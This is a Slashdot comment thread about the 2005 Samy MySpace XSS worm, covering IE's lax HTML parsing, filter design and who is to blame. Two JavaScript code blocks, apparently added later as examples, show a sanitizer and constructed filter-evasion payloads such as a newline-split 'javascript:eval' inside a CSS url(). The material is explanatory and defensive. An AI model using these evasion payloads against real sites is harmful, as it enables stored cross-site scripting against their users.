      You seem to have been meaning to write '': just out of curiosity, did you deliberately omit the semicolon in the HTML entity for 'less than'? I ask because that (omitting the ;) is another example of what you're complaining about. :)

    2. Re:IE is too forgiving by Kawahee · · Score: 4, Insightful
      This exploit isn't limited to IE; Safari also has this problem. And I'd probably attribute it to 'logical' coding
      pseudo-c code:

      if (tagname == "style" && tagtype == "text/css") {
          process_stylesheet (taginfo);
      } else if (tagname == "style") {
          switch (tagtype) {
              case "text/javascript":
                  process_js (taginfo);
                  break;
          }
      }

      But hopefully something less obvious that doesn't scream security flaw.
      --
      I'll subscribe to Slashdot when I see a month without a dupe, a typo, or an article the "editors" didn't read.
    3. Re:IE is too forgiving by smooth+wombat · · Score: 2, Interesting
      In the past, I've been of mixed feelings with IE correctly rendering the "intent" of a web-designer when the web-designer has created buggy HTML - this includes such things as omitting terminating tags (e.g., &ltl\li>) as well as a few other things

      I once made a comment in the Firefox forums about the difference between the way IE and Firefox interpret web pages. IE believes that everyone is an idiot and will pat the designer on the head and fix the errors without telling you what you did wrong. Firefox on the other hand presumes you are reasonably competent at what you are doing and will let you know when you screw up.

      --
      We will bankrupt ourselves in the vain search for absolute security. -- Dwight D. Eisenhower
    4. Re:IE is too forgiving by Anonymous Coward · · Score: 0

      I really don't think your examples are the best. It's fully legal in html to not close and to omit the semicolon on entities as long as it's not in the middle of a word, so this is legal:

      <ul><li>Test! &lt doh</ul>

      this is not:
      Test &ltdog

      Of course IE renders entities without ; inside words too, so if that's what you meant I totally agree :)

  • Re:IE is too forgiving by jferris · · Score: 1

    Not to go off on a little bit of a tangent, but you really hit upon something that is very irksome to me. Has anyone besides me stopped to wonder if the fact that there are a large number of largely ignorant HTML jockeys out there is because of the fact that IE continually "interprets" their best intentions? You have to stop and wonder, if IE actually became more strict in parsing and rendering, if a fair number of people would find themselves out of work... This isn't intended as a knock against web developers, either. I do my fair share of web development work, as well.

    --
    You are in a maze of little twisting passages, all different.
  • Re:IE is too forgiving by Anonymous Coward · · Score: 0

    LI does not require a closing tag. Take a look at the spec:
    http://www.w3.org/TR/REC-html40/struct/lists.html

  • Re:IE is too forgiving by Anonymous Coward · · Score: 0

    HTML 4.01, a standard that web browsers should support, allows this.

    http://www.w3.org/TR/html4/struct/lists.html

  • Re:IE is too forgiving by StillNeedMoreCoffee · · Score: 2, Interesting

    I have a 3d party site that brands its content for us but does it using and tags. The tag is forbidden by the W3C standard

    http://www.w3.org/TR/REC-html40/struct/objects.html#h-13.2

    Notice "Start tag: required, End tag: forbidden"

    Which is pretty unambiguous.

    That site's response to letting them know that they were putting out "Forbidden" tags was to come up with a "Compatibility Matrix" for which browsers and versions of browsers would work with their site.

    This is unfortunately the attitude of many sites and site designers. If it works for I.E. then we are done. We just document the bug with a compatibility matrix and we are golden. The problem here is in the branding: if you have Netscape and some versions of Firefox and a few others, our company logo will not show.

    My contention is if you have a product that only works for one browser you have a client server application not a web application.

  • Re:IE is too forgiving by idokus · · Score: 1

    from the w3.org :
    html 3.2 standard: http://www.w3.org/TR/REC-html32#dtd
    html 4.0 standard: http://www.w3.org/TR/1998/REC-html40-19980424/struct/lists.html

    both state (though in example): that LI elements do not need to be terminated.

    So it is not the wrong rendering, it valid HTML.

    I don't know about XHTML (couldn't look it up so quickly) but going on the basics, it looks as though it is not necessary there either, since the only elements a UL or OL can have are LI elements. Therefore, if another LI at the same level starts, it is unambiguous that it is also the end of the previous one.

    But if you go by the definition of XML then yes, it should not be omitted, but HTML is not XML.

    But don't blame a browser for a buggy definition. You can Blame IE for having nonstandard tags, and allowing for example <b>some text<i>some more text</b>and then something else</i>

  • Re:IE is too forgiving by HTH+NE1 · · Score: 1

    So IE implements HTML for DWIMmies?

    --
    Oh, say does that Star-Spangled Banner entwine / The myrtle of Venus with Bacchus's vine?
  • Re:IE is too forgiving by MCraigW · · Score: 1

    But XHTML does require closing tags on all non-empty elements. See http://www.w3.org/TR/2002/REC-xhtml1-20020801/#h-4.3

  • Re:IE is too forgiving by MCraigW · · Score: 1

    XHTML requires closing tags on all non-empty elements. See http://www.w3.org/TR/2002/REC-xhtml1-20020801/#h-4.3

  • Re:IE is too forgiving by MCraigW · · Score: 1
    Very few web-sites, including this one, use valid HTML. Pick a web site and then check it out on the W3C Validator: http://validator.w3.org/detailed.html

    Slashdot now blocks you from checking its site using the validator.... Not long ago though, (when it switched to HTML 4.01) it did allow it, and none of the Slashdot pages I checked passed validation.

    Oh... and this invalid HTML renders just fine in FireFox, as well as pretty much any other browser.

  • Re:IE is too forgiving by smooth+wombat · · Score: 1

    Absolutely. I didn't mean that a site had to be coded perfectly. Just that it had to be somewhat close. Even FF will forgive some errors.

    However, leaving out an opening or closing <HTML> tag will cause FF to display text rather than the page whereas IE will continue to render the page because it will put in the missing tag.

    --
    We will bankrupt ourselves in the vain search for absolute security. -- Dwight D. Eisenhower
  • Re:IE is too forgiving by idokus · · Score: 1

    Tnx, I did look for it, just couldn't find it.
    I also thought it was necessary for XHTML, but I do think it is a bit redundant, due to the fact that by the definition a LI element needs to be enclosed by or its parent's (UL or OL) or a next element.

    for example:
    UL
      LI other xhtml /LI
      some other tag /some other tag
      LI other xhtml /LI
    /UL

    is in fact an illegal XHTML statement, thus every LI-element is followed by either LI-element or (/UL | /OL)

    ok XHTML isn't completely XML compliant if you define it that way. But that's just a small price to pay.

    And therefor it is, I think just unnecessary code, just as easily parsable, unless of course you can redefine a list in XHTML, but I don't think that's allowed.
    it's just more to write if you write it by hand. For generated files it probably will be just as easy.

  • Re:IE is too forgiving by Anonymous Coward · · Score: 0
    Or you could write pseudo-c that doesn't suck:
    if (tagname == "style") {
        switch (tagtype) {
            case "text/css":
                process_stylesheet (taginfo);
                break;
     
            case "text/javascript":
                process_js (taginfo);
                break;
            }
    }
  • Re:IE is too forgiving by Anonymous Coward · · Score: 0

    Thanks asshole, now you are in my friends list.

  • Re:IE is too forgiving by Bert64 · · Score: 1

    IE will also render html if its mime type is TEXT/PLAIN; you might assume that you could return any data in a text/plain page and the browser wouldn't try to interpret it, so you're safe from cross site scripting.. But you're not, not if your users run IE.

    --
    http://spamdecoy.net - free throwaway anonymous email - avoid spam!
  • Re:IE is too forgiving by Bert64 · · Score: 1

    The result of IE rendering bad html coupled with its popularity has been very bad for the web... If none of the most popular browsers rendered broken html, then web designers would have no choice but to put out working html..
    The MySpace example is a good one.. If html all follows standards, then it's relatively easy to filter out anything malicious, but when your filter has to cater for every non standard behaviour it becomes very difficult.. Not to mention the fact that most of these behaviours are not documented..
    What it boils down to, is microsoft intentionally rendering poor html, and also putting out tools to create bad html (frontpage) with the intent of making sites that didn't render in netscape.. Then they could point and say "look how crap those sites look in netscape, they render fine in ie" and 99% of people wouldn't realise what was truly happening.

    --
    http://spamdecoy.net - free throwaway anonymous email - avoid spam!
  • Re:IE is too forgiving by Kawahee · · Score: 1

    Amazing. You managed to apply my logical coding argument to my code to make it even worse. If you read my comment, you'll see that was what I was getting at. You could make it even better by having a linked list of tags and their process_* functions, and a linked list of types and their process_* functions, and have type prioritise over tag, and end up with IE and Safari and my original argument sort of thing.

    --
    I'll subscribe to Slashdot when I see a month without a dupe, a typo, or an article the "editors" didn't read.
  • Here's the Guys Explanation of his code by putko · · Score: 5, Informative

    Here is his explanation -- it goes over the transformations he had to make to the program to smuggle it past Myspace's filters.

    And here is his version of the story.

    He comes off as a sweet practical joker. But maybe that's just b.s. that he cooked up after he realized he might have some 'splainin' to do.

    Also, his site really is "namb.la" -- he's making some sort of joke at NAMBDLA's expense, which is pretty suspect, I think.

    --
    http://www.thebricktestament.com/the_law/when_to_stone_your_children/dt21_18a.html
    1. Re:Here's the Guys Explanation of his code by Kristoffer+Lunden · · Score: 4, Funny

      What's so wrong with joking with the North American Marlon Brando Look Alikes? I think they can take it. =)

    2. Re:Here's the Guys Explanation of his code by Anonymous Coward · · Score: 0

      You're kidding right? I thought NAMBLA's mission statement was to be the butt of jokes.

    3. Re:Here's the Guys Explanation of his code by fmwap · · Score: 1

      Wow, this guy is so fucked...

      Not only releasing a self propagating worm, but openly confessing to copyright infringement in his explanation.

      If I were Samy, I'd be on the first flight out of the country.

    4. Re:Here's the Guys Explanation of his code by Anonymous Coward · · Score: 0

      Here is his explanation

      Yeah, right. There's no way you're tricking me into going to some page with a suspicious URL like that!

    5. Re:Here's the Guys Explanation of his code by Anonymous Coward · · Score: 0

      Making a joke at NAMBDLA's expense? I don't know who this NAMBDLA group is, but it seems more likely he's making a reference to the North American Man-Boy Love Association (NAMBLA). Personally I think it's just fine to make jokes at their expense.

    6. Re:Here's the Guys Explanation of his code by Hosiah · · Score: 4, Funny
      Yeah, right.

      LOL No kidding! "Here's the home page of the guy famous for writing viral web code that infects your browser, wanna go see it?" Golly, sounds like a swell idea, what's the worst that could happen?

    7. Re:Here's the Guys Explanation of his code by HexRei · · Score: 1

      ya, anyone who would make a joke at the expense of those wonderful nambla fellows must be a dirty rotten scoundrel.

  • With a name like MySpace... by Eric+Giguere · · Score: 4, Funny

    ... it shouldn't be surprising that someone took it literally and tried to claim it all for himself.

    Eric
    William Shatner boldly goes like no man has before
  • samy is my hero by gr8n10zt · · Score: 5, Informative

    The scoop from himself: http://fast.info/myspace/

  • In the beginning by Dogsbody_D · · Score: 3, Insightful

    This was bound to happen sooner or later, as MySpace repeats the history of the internet. Just look at the huge number of practically unreadable webpages with different size fonts and different colours, terribly inappropriate background images. Oh, and a load of commercial interests trying to stuff things down our throats. Loads of chicks though... ;)

    1. Re:In the beginning by White+Shade · · Score: 2, Informative

      there ARE lots of chicks, yes, but they're all 15 years old! (claiming to be 99, and that they're "bi", and "married" to their favourite female friend from middle school, haha)

      myspace is certainly addictive though ;)

  • Interview with "Samy" by Bananatree3 · · Score: 2, Informative
    There is some guy's blog that has a personal interview with Samy, the writer of this "my hero" worm here ):

    1. Re:Interview with "Samy" by GeoSanDiego · · Score: 1

      Slashdot coulda had the scoop. I know Samy and I submitted this to them 3 days ago: http://fast.info/samy

  • Re:Day late, dollar short. by Anonymous Coward · · Score: 1, Insightful

    So true. Don't go away mad kids, just go away

  • samy is my hero by zippity8 · · Score: 4, Informative

    Turns out that he just used the fact that (not trying to start a flame war here) IE and some versions of Safari allow javascript tags within CSS.

    Samy's info on the topic (coral)
    His explanation of how it works

  • And the phrase for self-replicating viruses was... by benhocking · · Score: 5, Funny

    And the phrase for self-replicating viruses was "gossip". Unfortunately, the viruses would occasionally replicate with mutations, but this only made them stronger.

    --
    Ben Hocking
    Need a professional organizer?
  • Don't you hate when you forget stuff? by UserGoogol · · Score: 4, Funny
    Thankfully, the script was written for fun and didn't try to take advantage of unpatched security holes in IE to create a massive MySpace botnet.
    FUCK! I knew I forgot to do something. I forgot to set the evil bit!
    --
    "Never attribute to malice that which can be adequately explained by stupidity." -- Hanlon's Razor
  • time to use quoting? by digitaldc · · Score: 1

    Didn't they use quoting?
    Maybe next time they might want to look here:
    http://shiflett.org/articles/foiling-cross-site-attacks

    --
    He who knows best knows how little he knows. - Thomas Jefferson
  • Re:Day late, dollar short. by mwvdlee · · Score: 3, Insightful

    If /. sucks so much, why are you still here?

    --
    Slashdot social media options: AIM, ICQ, Yahoo, Jabber and Mobile Text. Why no MySpace?
  • Re:Day late, dollar short. by Anonymous Coward · · Score: 0

    Considering that Slashdot links to stories on other sites you're never going to see it here first. Get it?

  • Re:Day late, dollar short. by cuzality · · Score: 1

    What tech podcasts do you listen to? The only one I have really gotten into is TWiT -- any recommendations?

  • Woefully inefficient by jfengel · · Score: 1

    How are you gonna make a million friends a day that way? Progress, my boy, progress!

  • XSS basics by flanker · · Score: 4, Informative

    Cross-site scripting is a family of vulnerabilities that share these attributes: a) a web-site that takes and displays text (e.g. Slashdot allows you to post comments) and b) a web browser that processes javascript in webpages.

    The exploit involves placing javascript code into your posting on a website, such that when other people visit the website their browsers download your comment with the embedded javascript, which is then processed. The javascript, because it is being processed on your machine as part of the rendering of the page, can be used to exploit all sorts of vulnerabilities within browsers. When you have browsers tightly coupled with operating systems, this can open up some rather scary scenarios.

    In this case, the guy just used the vulnerability to make some relatively benign changes, but he could have just as easily exploited some of the many problems with IE to be more malicious.

    --
    Left shift 1 for e-mail...
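
    Kent Recal's two defences further up (replace the angle brackets with &lt; and &gt;, or pipe the input through a really simple HTML parser) and the stored-XSS filtering flanker describes here, written out as an added example. This is my code, not code from the thread, MySpace or Samy; the function names and the banned-word and allowed-tag lists are assumptions made for the example.

```javascript
// Added example, not code from the Slashdot thread, MySpace or Samy.
// It contrasts the word-blacklist approach the thread criticises with the two
// defences named in the thread: escaping angle brackets, or running the input
// through a small parser that keeps only an allowlist of tag names.
// Function names and the word/tag lists are assumptions made for the example.

// 1. Output encoding: user text is rendered as text, never as markup.
//    This is the "replace all angle brackets by &lt; and &gt;" option.
function escapeHtml(text) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return text.replace(/[&<>"']/g, (c) => map[c]);
}

// 2. A word blacklist of the kind the thread describes: it scans the raw text
//    for forbidden spellings, so it accepts anything the filter author did not
//    anticipate (a word broken by a newline, for instance) and therefore
//    depends on knowing every browser quirk, the problem Bogtha raises below.
const BANNED_WORDS = ["javascript", "<script", "<style"]; // constructed list
function blacklistAllows(html) {
  const lower = html.toLowerCase();
  return !BANNED_WORDS.some((word) => lower.includes(word));
}

// 3. A (really, really simple) allowlist parser. The input is split into tags
//    and text; a tag survives only if its exact name is on the allowlist, and
//    it is re-emitted from its name alone, so attributes (style, event
//    handlers) never reach the page. Anything else that looks like a tag,
//    "<java\nscript>" included, is simply not an allowed tag and is dropped;
//    the text between tags is escaped.
const ALLOWED_TAGS = new Set(["b", "i", "u", "p", "br", "em", "strong"]); // constructed
function sanitizeHtml(html) {
  // A tag is "<", an optional "/", and a name that begins with a letter.
  // The name stops at the first non-alphanumeric character, so a newline
  // inside the name ends it early and the rest is swallowed with the tag.
  const tagRe = /<(\/?)([a-zA-Z][a-zA-Z0-9]*)[^>]*>/g;
  let out = "";
  let last = 0;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    out += escapeHtml(html.slice(last, m.index));
    const closing = m[1] === "/";
    const name = m[2].toLowerCase();
    if (ALLOWED_TAGS.has(name)) {
      out += closing ? `</${name}>` : `<${name}>`;
    }
    last = tagRe.lastIndex;
  }
  return out + escapeHtml(html.slice(last));
}

// Stand-alone demonstration on constructed input: the newline-split tag
// from the thread passes the blacklist but does not survive the allowlist.
function demo() {
  const input = "<java\nscript>hello</java\nscript> <B onmouseover=\"x()\">bold</B> 1 < 2";
  return {
    blacklistAllows: blacklistAllows(input), // true: no banned spelling matched
    escaped: escapeHtml(input),              // every bracket neutralised
    sanitized: sanitizeHtml(input),          // "hello <b>bold</b> 1 &lt; 2"
  };
}
console.log(demo());
```

    Escaping is the right choice when user text is never meant to carry markup; the allowlist parser is for sites that, like MySpace, let users format their own pages.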
    1. Re:XSS basics by ergo98 · · Score: 1

      Cross-site scripting is a family of vulnerabilities that share these attributes: a) a web-site that takes and displays text (e.g. Slashdot allows you to post comments) and b) a web browser that processes javascript in webpages.

      Is that just a classic script injection attack?

      I always thought a cross site scripting attack was actually a method for script from one site to use content from another site. e.g. I embed a full-size IFRAME in my site, or I launch a new window, that loads the real PayPal, and from my site I monitor the form controls on the PayPal page, or alternatelly I embed some of another site's script into my site.

      Of course browsers should prohibit this sort of cross-site scripting, but there have been cases where the controls have been circumvented.

    2. Re:XSS basics by flanker · · Score: 1

      Referencing your wikipedia link, I describe the Type 2 XSS vulnerability, which is what was used in this case.

      When you say "script injection" are you talking about "SQL injection"? THis is where you manipulate data submitted to a database-backed web site to place a SQL statement termination character in the data (knowing that it is going to be put into a SQL INSERT statement). Then you append malicious SQL code which will be executed by the RDBMS of the web-site.

      I'm not really sure how your example would work. If you embed the PayPal in an IFRAME on a page hosted on your site, clicks on the PayPal site will be routed to the PayPal server, not yours.

      --
      Left shift 1 for e-mail...
  • XMLHttpRequest by matth1jd · · Score: 1

    Everyone knows that XMLHttpRequest isn't secure. Where do we go from here? Is there a way to force the object to use SSL? Is there too much overhead in encrypting and decrypting the XML data with Blowfish or another algorithm?

    1. Re:XMLHttpRequest by patio11 · · Score: 3, Informative

      What would encryping anything have accomplished, exactly? The problem isn't that someone intercepted a legitimate transfer in the middle and modified it to be evil. The problem is that one end of the legitimate transfer was compromised, and the other end of the legitimate transfer was too trusting of the input from the compromised end, and then happily passed along that input (perfectly legitimately) to other parties who were then compromised themselves.

    2. Re:XMLHttpRequest by Slashcrap · · Score: 1

      Is there a way to force the object to use SSL?

      Yes, I'm sure that there is.

      Is there too much overhead in encrypting and decrypting the XML data with Blowfish or another algorithm?

      Probably not, for most sites and applications.

      But the point is that encrypting the network traffic between the client and the server would have done nothing to prevent this vulnerability. Or most others for that matter. The only thing encryption would prevent is the snooping of traffic between client & server.

    3. Re:XMLHttpRequest by Anonymous Coward · · Score: 0
      Everyone knows that XMLHttpRequest isn't secure.

      What a stupidly unqualified statement.

      When is XmlHttpRequest not secure? That's right, when you let random users enter JavaScript/HTML code that is viewable by anyone else.

      XmlHttpRequest is just fine if it's written into the application properly.

      I'd bet dollars to donuts you're one of the imbeciles that turns off cookies, too - meaning instead of passing Cookie: with the HTTP headers us web developers simply append ?cookie= to all of your URL strings and POST forms. Doy...
  • Obligatory... by kukickface · · Score: 3, Funny

    All your friends...All your friends...All your friends are belong to us. Its the mega-happy-funtime disco hit of 2005!

  • Re:Well, people have been saying it's a security r by -kertrats- · · Score: 4, Insightful

    They don't have javascript enabled. As far as I can tell, he just used IE's magical ability to run broken code so that the browser would be able to piece together the mess he used, but Myspace wouldn't be able to tell it was javascript.

    --
    The Braying and Neighing of Barnyard Animals Follows.
  • That's Irrevellant by BobPaul · · Score: 1

    I don't care how he got the javascript to load. The fact of the matter is he got it to load. While it's Microsoft's fault for shipping a faulty browser, it's still the website's fault for not properly filtering. You can't just block the words "Javascript" and "Script" and call it good.

    1. Re:That's Irrevellant by Delirium+Tremens · · Score: 1

      You're right. The least they could have done was to look at the source code for IE and analyze its logic for the interpretation of script tags.
      ... Oh wait ...

    2. Re:That's Irrevellant by Bogtha · · Score: 3, Insightful

      I don't care how he got the javascript to load. The fact of the matter is he got it to load. While it's Microsoft's fault for shipping a faulty browser, it's still the website's fault for not properly filtering.

      That's not the right attitude. The problem lies with web browsers that accept non-standard code.

      Malicious code comes in two flavours - code that is outright malicious, and code that is completely benign in browsers that conform to the W3C specifications, but is interpreted wrongly by some browsers to generate a malicious effect.

      The first type is easy to filter out, because you can go to the spec and see how things are meant to be interpreted, and from that determine what should be filtered out. The other type, though, is much harder to filter out, as you also need to be aware of all the little quirks and foibles of all browsers likely to be used to access your web application - something that isn't written down anywhere most of the time.

      For example, you might have written code that strips out HTML tags. That's fine, except some versions of Netscape Navigator 4.x treat entirely different Unicode characters as if they were < and >. As a web developer, you have no way of knowing about this unless you are privy to some of the most obscure browser trivia in the world, so unless you take a default deny policy and outlaw any non-ASCII characters (goodbye international visitors), you are likely to write code that is vulnerable to this attack - for Netscape 4 users.

      Now multiply that problem by all browsers in use today, and all the little quirks and deviations from spec. that they have, and you'll start to get an idea of why it's not feasible for web developers to be responsible for this problem, and why the responsibility lies at the browser developers' feet.

      --
      Bogtha Bogtha Bogtha
    3. Re:That's Irrevellant by MikeFM · · Score: 2, Funny

      The point is that there is no way to know every possible loophole because IE is extremely buggy and nobody outside of M$ can look at the source to figure out all possible problems. Most likely the problem is so big that even with the source you couldn't figure out all the possible exploits in the time it'd take you to just write a better browser.

      How else could they block Javascript without eliminating the ability to post bits of code or pseudo-code for artistic or informational reasons? Even then it could probably be snuck in given that code doesn't really have any secret give away footprint that makes it possible to filter out.

      About the only way to protect against such a problem is to block any browser from using the site that is too forgiving of bad web code. I'd imagine most other sites that let users post stuff others can read can be infected in a similar way.

      I just hope the poor guy that wrote this code doesn't get in trouble. It doesn't sound as if he really knew how fast it'd grow and it was a much needed wakeup call to MySpace and the industry as a whole.

      What we really need is for every major website to agree to a blanket anti-IE policy until IE is fixed, with like treatment for any other browser of similar shady quality (none that I can think of), where starting on a certain day all those sites redirect IE users to a site that'll help them download and install their choice of better browser. Firefox, Safari, Opera, or whatever (Lynx anyone?). Get the top ten websites to do that, with an explanation as to why, and you could change a high enough percentage of users over to make a permanent change. Hell, use those browser holes to make installing an alternate browser easy. Once directed to the site explaining the situation have the page offer the choice of available browsers each with an 'Install Now' button next to it. As soon as the user clicks the button install the new browser as the default browser and remove all shortcuts to IE. No need to figure out how to download and install anything after that one click.

      --
      At what price learning? At what cost wisdom? The price is a man's peace of mind, and the cost is his life.
    4. Re:That's Irrevellant by TWX · · Score: 3, Informative

      And because of that, I still use Netscape 3.0 Gold on GUI machines, and I telnet to port 80 on console machines...

      ;)

      --
      Do not look into laser with remaining eye.
    5. Re:That's Irrevellant by BKX · · Score: 1

      Are you serious?!? You use Telnet? For security? Why not a recent OpenSSH? At least then you'll have some semblance of security instead of plain text over whatever untrusted network. (Whoosh. [Let's out sigh] Now that I've caught my breath.) Man, I don't think I've heard anyone say Telnet in quite a while. Almost had a heart attack.

    6. Re:That's Irrevellant by maxwell+demon · · Score: 1
      One of the problems he exploited was that IE obviously eliminates newline characters before searching for the tags. That is, if you write
      "Javas
      cript"

      inside an attribute, then IE will interpret that as "Javascript" anyway, but it evaded the filter at MySpace (which did scan for "Javascript"). Now I'm not sure that it's really the website's fault not to know about an IE bug which is that stupid.
      --
      The Tao of math: The numbers you can count are not the real numbers.
    7. Re:That's Irrevellant by SatanicPuppy · · Score: 2, Funny

      Seems like he could have used the same bug to make "Javascript" into:
      j-a-v-a-s-c-r-i-p-t, with each character on a new line. It'd be pretty hard for a filter to catch something like that, though I suppose they could strip out newlines and whitespace as well and just look for character sequences.

      What a pain in the butt though. Seems like M$ could just produce a browser that doesn't go out of its way to screw itself.

      --
      ad logicam Claiming a proposition is false because it was presented as the conclusion of a fallacious argument.
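      The two comments above (maxwell+demon on the newline-split "Javas\ncript", SatanicPuppy on splitting every character) describe the same filter-evasion pattern: the filter scans the raw text for a keyword, the browser collapses whitespace inside the attribute before interpreting it, so the two sides disagree about what the value says. The block below is an added example, not MySpace's filter or any code from the worm writeup; the blocklist, the payloads and the allowlist rule are assumed for illustration. It models the browser's normalization as "drop all whitespace and control characters", then shows a naive keyword scan missing both payloads, a scan over the normalized value catching both, and an allowlist check that does not need to know the keyword at all.

```javascript
// Added example (not MySpace's code, not the worm's code). Payloads and rules are constructed.

// Model of what the comments say IE did inside an attribute value: newlines
// (here: all whitespace and control characters) vanish before interpretation,
// so "java\nscript:" is seen as "javascript:".
function browserNormalize(attrValue) {
  return attrValue.replace(/[\s\u0000-\u001f]+/g, "");
}

// Filter 1: the naive approach the comment describes, scanning the raw text
// for the keyword. Anything that splits the keyword slips through.
function naiveFilterRejects(input) {
  return /javascript/i.test(input);
}

// Filter 2: normalize at least as aggressively as the most forgiving consumer,
// then scan. Whatever the browser will collapse, the filter collapses first.
function normalizedFilterRejects(input) {
  return /javascript:/i.test(browserNormalize(input));
}

// Filter 3: an allowlist instead of a blocklist. Only a url() whose scheme is
// http or https (after normalization) is accepted; everything else is refused,
// so no list of forbidden words has to be kept complete. (Assumed policy.)
function cssUrlAllowed(input) {
  const m = /^url\((['"]?)([^'")]*)\1\)$/i.exec(browserNormalize(input));
  if (!m) return false;
  return /^https?:\/\//i.test(m[2]);
}

// Constructed payloads in the shapes the comments describe.
const SPLIT_ONCE = "url('java\nscript:eval(document.all.mycode.expr)')";
const SPLIT_EVERY_CHAR = "url('" + "javascript".split("").join("\n") + ":alert(1)')";
const BENIGN = "url('http://example.com/bg.jpg')";

// Run one value through all three checks and report what the browser would see.
function evaluate(payload) {
  return {
    browserSees: browserNormalize(payload),
    naiveRejects: naiveFilterRejects(payload),
    normalizedRejects: normalizedFilterRejects(payload),
    allowlistAccepts: cssUrlAllowed(payload),
  };
}

for (const p of [SPLIT_ONCE, SPLIT_EVERY_CHAR, BENIGN]) {
  console.log(JSON.stringify(evaluate(p)));
}
```

      The design point is in filter 2 versus filter 3: normalizing before matching closes the specific gap, but only for the transformations the filter author knows the browser performs, which is exactly what maxwell+demon says the site could not be expected to know. The allowlist does not depend on that knowledge.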
    8. Re:That's Irrevellant by techmeltz · · Score: 2, Insightful

      You don't ssh to port 80 to read a web page. Dolt.

      --
      [This space for rent]
    9. Re:That's Irrevellant by lawpoop · · Score: 1

      "Malicious code comes in two flavours - code that is outright malicious, and code that is completely benign in browsers that conform to the W3C specifications, but is interpreted wrongly by some browsers to generate a malicious effect."

      A bit of nitpicking -- malicious specifically refers to evil intent. If you say that some browsers generate a malicious effect, you are saying that the effect has mental states and that its mental state is desirous of harm.

      Dictionary.com says about malicious:
      Having the nature of or resulting from malice; deliberately harmful; spiteful

      Maybe pick another word other than malicious for your outright/wrong interpretation bad code system.

      --
      Computers are useless. They can only give you answers.
      -- Pablo Picasso
    10. Re:That's Irrevellant by radtea · · Score: 2, Interesting

      responsibility lies at the browser developers' feet.

      Users want browsers that will render their webpages, including pages they author themselves. Because the average person is not capable of writing a web page that parses, and many tools for writing web pages generate invalid HTML, any standards-compliant browser will not render most of the web. Try running your own web pages through SP using any W3C HTML DTD and see what I mean.

      The situation is an artefact left over like a minefield from the browser war in the '90s. If either Netscape or Microsoft had focused on standards compliance they would have lost market share. It is likely that both companies were actively trying to break standards as a means of locking in users.

      Now that things have settled down Microsoft is the only corporate player with an ongoing interest in locking in users, but users are still going to expect browsers to render everything, no matter how malformed. Users experience any failure to render as a browser problem, not an authoring problem. As such, it is going to be difficult to get the web as a whole to be standards-compliant.

      One of the fundamental laws of human behaviour was most clearly enunciated by Han Solo: "It's not my fault! It's not my fault!" We can sit back and say that any user of IE deserves to get burned by exploits, or that anyone authoring an invalid web page deserves to not get page views, but the Darwinian market is fundamentally a mechanism for humans to shift blame for their own failures onto others, and users choose IE and users choose MySpace, so neither browser choice nor website choice will ever be accepted as the cause of users' problems.

      --
      Blasphemy is a human right. Blasphemophobia kills.
    11. Re:That's Irrevellant by Anonymous Coward · · Score: 0

      He means malicious. Specifically, code written with a malicious intent.

    12. Re:That's Irrevellant by 6*7 · · Score: 2, Insightful

      I'd consider telnetting to any port dangerous, imagine what could happen if the server started sending terminal control sequences.

    13. Re:That's Irrevellant by adpowers · · Score: 1

      Netscape 3.0? Too high tech for me. My friend reads Gmail with NS 2.0.

      Yes, that is a 64K binary being emulated for PPC in Classic (IIRC).

    14. Re:That's Irrevellant by MCraigW · · Score: 1
      That's not the right attitude. The problem lies with web browsers that accept non-standard code.

      Uhh.. that would be all of them. If you're reading this page, then your browser is interpreting invalid HTML 4.01.

      If you would like to try an experiment to prove it, then do a "View Source" on this page and then save it off as "test.htm". Then upload and validate it here http://validator.w3.org/file-upload.html

      I would guess that you decided that it was the web browser's fault, when you thought that IE would interpret invalid HTML while Firefox wouldn't, but it turns out that Firefox interprets invalid HTML too.

      Most web pages are invalid HTML, or XHTML, or DHTML, or whatever the W3C is calling the latest version of it.

      You can try validating other sites here http://validator.w3.org/detailed.html, you can just enter the URL.

      I think that the blame for allowing this particular exploit lies in both camps -- but the blame for creating the problem was the authors.

    15. Re:That's Irrevellant by Hentai · · Score: 1

      That word would be "maleficent". Malicious : Maleficent :: Intent : Effect.

      --
      -Hentai [in vita non pacem est]
    16. Re:That's Irrevellant by fbjon · · Score: 1
      Ctrl-z would get pressed, and 'reset' would get typed.

      Besides, telnetting to a port is useful for testing and debugging. I tend to telnet to port 80 of a host, then type GET / HTTP/1.0 in order to get its headers, if I don't happen to have a quicker way to do it.

      --
      True confidence comes not from realising you are as good as your peers, but that your peers are as bad as you are.
    17. Re:That's Irrevellant by monkeyboythom · · Score: 1

      No. What is relevant is that that dude has to program his friends.

    18. Re:That's Irrevellant by Bogtha · · Score: 1

      I would guess that you decided that it was the web browser's fault, when you thought that IE would interpret invalid HTML while Firefox wouldn't, but it turns out that Firefox interprets invalid HTML too.

      Bloody hell, you're pretty damn condescending. Yes, I'm well aware that typical browsers accept invalid HTML. As a rule of thumb, don't assume you need to explain basic workings of browsers to somebody who has just finished talking about obscure bugs in ancient browsers.

      My point is that it is this attitude of lax requirements of browsers, rather than failings of web developers, that leads to vulnerabilities like this. You are the one bringing up Firefox, I never mentioned it.

      PS: If you're going to talk down to somebody about web development, at least have the foresight to not link to your homepage full of junk code while you are doing so. Transitional? Table layouts? Broken Javascript? You've no business lecturing others on web development.

      --
      Bogtha Bogtha Bogtha
    19. Re:That's Irrevellant by 6*7 · · Score: 1

      "Ctrl-z would get pressed, and 'reset' would get typed."

      How naive, by then it could already be too late. Consider DSA 697-1: http://www.debian.org/security/2005/dsa-697

      It's quite shocking to find those kinds of bugs in ancient programs. More info can be found e.g. on http://www.digitaldefense.net/labs/papers/Termulation.txt

      BTW a simple way to get headers:
      lynx -head -dump URL
        or
      the live http header plugin for Fire*
        or
      (t)ethereal/tcpdump (keep it up to date for the same reason as above)

    20. Re:That's Irrevellant by Anonymous Coward · · Score: 0

      That doesn't even make sense.

      "You don't even make sense!"

    21. Re:That's Irrevellant by EternityInterface · · Score: 0

      That's not the right attitude.

      You'll get that attitude after reading the reply to the FAQ question Why is my Profile page suddenly messed up? It has music, sound or strange graphics on it?

      --
      the sun is god
    22. Re:That's Irrevellant by EternityInterface · · Score: 0

      My$pace. There we go.

      --
      the sun is god
  • Here is the source: by rpcxdr · · Score: 1, Redundant

    The source and the explanation.

  • The Code by pturpin · · Score: 2, Informative

    Here is a link to the blog entry the article mentions that contains the code of the worm. (From Evan Martin of Google)

  • Clever kid... by Anonymous Coward · · Score: 0

    ...I think I definitely want to be his buddy. :)

